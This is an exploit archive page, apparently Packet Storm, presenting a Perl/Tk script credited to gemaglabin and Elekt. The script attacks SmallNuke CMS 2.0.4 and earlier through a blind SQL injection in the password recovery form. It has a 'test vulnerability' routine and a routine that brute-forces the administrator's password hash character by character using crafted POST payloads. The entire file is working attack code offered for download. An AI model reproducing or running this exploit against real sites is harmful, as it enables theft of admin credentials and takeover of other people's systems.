what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

smallnuke-sql.txt

smallnuke-sql.txt
Posted Jan 8, 2008
Authored by Eugene Minaev | Site itdefence.ru

SmallNuke versions 2.0.4 and below password recovery remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 6232950b77c18aa9a480715fb6e456fb36fbaf78a85bb33305b6d5c799bf1395

smallnuke-sql.txt

Change Mirror Download
#!/usr/bin/perl

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "UnderWHAT?!" );

$mw->geometry ( '420x365' ) ;
$mw->resizable(0,0);

$mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack();
$mw->Label(-text => 'Smallnuke cms <= 2.0.4 Pass Recovery Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();


$fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://test2.ru/smallnuke/';
$user_id = '1';
$prefix = 'sn_';
$table = 'users';
$email = 'ge@ma.ru';
$column = 'user_password';
$report = '';
$group = 1;
$curr_user = 0;



$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Your email: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$email) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fright->Button(-text => 'Test site vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();

$fright->Button(-text => 'Get hash from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_hash
)->pack();

$mw ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
$fleft->Label(-text => 'Smallnuke cms 2.0.4', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'pass recovery sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'bug in insert function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'by gemaglabin and Elekt ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'thx KSURi for perl help ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => ' 2007.02.04 ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack();
$print=$fright->Text(-width=>35,-height=>7,-wrap=>"word")->pack(-side=>"top",-anchor=>"s");

MainLoop();

sub get_hash()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
$i = 1;
$b = 0;
$report = '';
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Start [$hour:$min:$sec]\n");
my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
while (length($report)<32)
{
$num = $brutearray[$b];
$ret = get_pchar($i);
if($ret > 0)
{
$print->insert('end',"- char [$i] = ".chr($num)."\n");
$report .= chr($num);
$b = 0;
$i = $i +1;
$mw->update();
break;
}
else
{
$b = $b +1;
}
}
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Finish [$hour:$min:$sec]");
}

sub get_pchar($i)
{
$res = $xpl->post($url."index.php?go=Members",['in'=>'lost_pass','enter'=>'1','user_email'=>"$email' or ascii(substring((select password from ".$prefix."admins where admin_id=$user_id),$i,1))=$num/*"]);
if($res->as_string =~ /info=1/i ) { return 1;} else {return 0;}
}

sub test_vuln()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->post($url."index.php?go=Members",['in'=>'lost_pass','enter'=>'1','username'=>"gema' and ascii(1)=49/*"]);
if($res->{_rc}==302)
{
$rep = '';
if($res->as_string =~ /info=1/i ) { $print->insert('end',"- FORUM VULNERABLE\n"); }
else { $print->insert('end',"- FORUM UNVULNERABLE\n");}
}
}

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close